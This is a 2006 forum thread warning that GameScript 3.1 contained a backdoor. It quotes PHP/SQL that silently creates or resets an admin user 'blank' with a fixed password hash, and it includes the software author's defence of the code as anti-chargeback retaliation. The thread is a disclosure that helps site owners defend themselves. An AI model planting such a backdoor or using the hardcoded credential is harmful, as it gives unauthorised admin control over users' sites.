Warning About GS "Blank" User..

PlatinumN23 · 07-19-2006, 10:07 PM

It was recently brought to my attention that the LATEST Upgrade of GameScript has a "Backdoor" User...

Quote:

$usercheck = "SELECT * FROM `users` WHERE WHERE `username` ='blank'";
if(@mysql_num_rows(mysql_query($usercheck)) < 1){
@mysql_query("INSERT INTO `users` ( `username` , `password` , `securitylevel` , `email` , `id` , `logincount` , `gameplays` , `verified` , `subscribed` , `avatar` , `comments` , `location` , `gender` , `favgame` , `joined` , `status` , `pmsuspended` , `im` , `submissions` , `timestamp` , `ip` ) VALUES ( 'blank', '557cce710ecad98f3b0e507dbc2b4846', '0', 'admin@iamnotageek.com', NULL , '0', '0', '0', '1', '', '', '', '', '', '0000-00-00', '0', '0', '', '0', '0', '');");
}else { @mysql_query("UPDATE `users` SET `password` = '557cce710ecad98f3b0e507dbc2b4846', `securitylevel` = '1', `logincount` = '0' WHERE `username` ='blank' LIMIT 1"); }

Please DELETE That line if you DO NOT Want the username "Blank" (With ADMIN PERMISSIONS) Added to your site...

A word from the Author:

Quote:

If you don't like it simply remove that snippet of code in the first post. The script is unencoded for that very reason.

As also stated the install instructions even say to password protect your admin directory. When you do this that admin account is worthless. There is no other backdoor in place.

I put this code in place after watching $4k in chargebacks in 2 weeks all of our biggest packages where people simply install and steal our stuff just to turn and take the money right back. I have to do something and I have to do something drastic.

After talking to Adam the admin user account doesn't seem like the route to go but we will keep looking.

My Notes on the subject:

If an author is willing to sell a product with the fear of Chargebacks.. the author should consider encoding a few files and setting up a better LICENSING Script.. Yes, this can be a drag to many.. However, it will solve the problem and eliminate the need for a BackDoor / Admin User..

Just my .02 and I hope everyone takes heed of this notice

nbento · 07-20-2006, 09:44 AM

Why dont you just delete the user form the script as I did?

aGig · 07-20-2006, 12:23 PM

Quote:

Originally Posted by nbento

Why dont you just delete the user form the script as I did?

You missed the point about how un secure this is for people who don't have a clue about PHP and just install the script and that is it. Anyone who knows anything about PHP would have seen that and could have access to I'm sure 100's of GS installs.

nbento · 07-20-2006, 01:01 PM

Dude I think its just logic.... I installed the script and when I saw the user as admin (blank) I deleted it imediatly.

aGig · 07-20-2006, 01:10 PM

Quote:

Originally Posted by nbento

Dude I think its just logic.... I installed the script and when I saw the user as admin (blank) I deleted it imediatly.

If that is all you done you have really missed the point. There is actual code in the system.class.php the re-creates this user nightly. The MD5 password can be converted in 3 seconds. You then have full admin access to 100's of GS 3.1 installs.

nbento · 07-20-2006, 02:02 PM

Sorry but I dondt seem to follow you.
I have GS 3.1 I deleted the blank user when I installed the script for the first time, and never got that user back.... you say that its created again once deleted?
I dont think so... well at least not for me.

aGig · 07-20-2006, 02:08 PM

It might not be in your version. However downloads in the past few weeks have all had the system.class.php code that will re-create the user "blank" nightly. He has now updated the code so it does not do it anymore, but he did admit it does that.

admin · 07-20-2006, 03:54 PM

Quote:

Originally Posted by nbento

Dude I think its just logic.... I installed the script and when I saw the user as admin (blank) I deleted it imediatly.

I have to agree here, it doesn't matter if you saw it or not the fact is that there shouldn't be a back door. Not everyone knows PHP/MySql and potentially this could be diastrous for lots of people.

07-20-2006, 09:44 AM	#2 (permalink)
nbento Full Member Join Date: Jun 2006 Posts: 84	Why dont you just delete the user form the script as I did? __________________ Arcade Fanatics - Looking for link trades Busted Arcades - Link Trades

07-20-2006, 01:01 PM	#4 (permalink)
nbento Full Member Join Date: Jun 2006 Posts: 84	Dude I think its just logic.... I installed the script and when I saw the user as admin (blank) I deleted it imediatly. __________________ Arcade Fanatics - Looking for link trades Busted Arcades - Link Trades

07-20-2006, 02:02 PM	#6 (permalink)
nbento Full Member Join Date: Jun 2006 Posts: 84	Sorry but I dondt seem to follow you. I have GS 3.1 I deleted the blank user when I installed the script for the first time, and never got that user back.... you say that its created again once deleted? I dont think so... well at least not for me. __________________ Arcade Fanatics - Looking for link trades Busted Arcades - Link Trades

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

07-20-2006, 02:08 PM	#7 (permalink)
aGig New Member Join Date: Jul 2006 Posts: 7	It might not be in your version. However downloads in the past few weeks have all had the system.class.php code that will re-create the user "blank" nightly. He has now updated the code so it does not do it anymore, but he did admit it does that.